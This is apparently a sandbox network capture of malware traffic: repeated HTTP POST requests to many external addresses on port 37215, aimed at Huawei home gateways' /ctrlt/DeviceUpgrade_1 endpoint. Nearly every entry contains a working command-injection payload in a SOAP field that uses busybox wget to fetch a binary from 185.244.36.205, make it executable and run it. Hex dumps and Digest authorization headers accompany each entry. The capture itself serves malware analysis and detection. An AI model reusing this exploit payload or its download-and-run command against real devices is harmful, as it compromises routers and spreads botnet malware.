                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1531192.168.2.1553400121.33.234.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644164085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1532192.168.2.1557560197.20.212.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644185066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1533192.168.2.154103631.40.252.12637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644218922 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1534192.168.2.1536054186.187.175.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644227982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1535192.168.2.154670445.168.128.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644273996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1536192.168.2.153636631.123.177.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644280910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1537192.168.2.155500641.96.62.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644298077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1538192.168.2.154863631.71.115.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644315958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1539192.168.2.153898865.231.100.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644320011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1540192.168.2.1540838157.22.161.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644340992 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1541192.168.2.1555308138.93.231.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644341946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
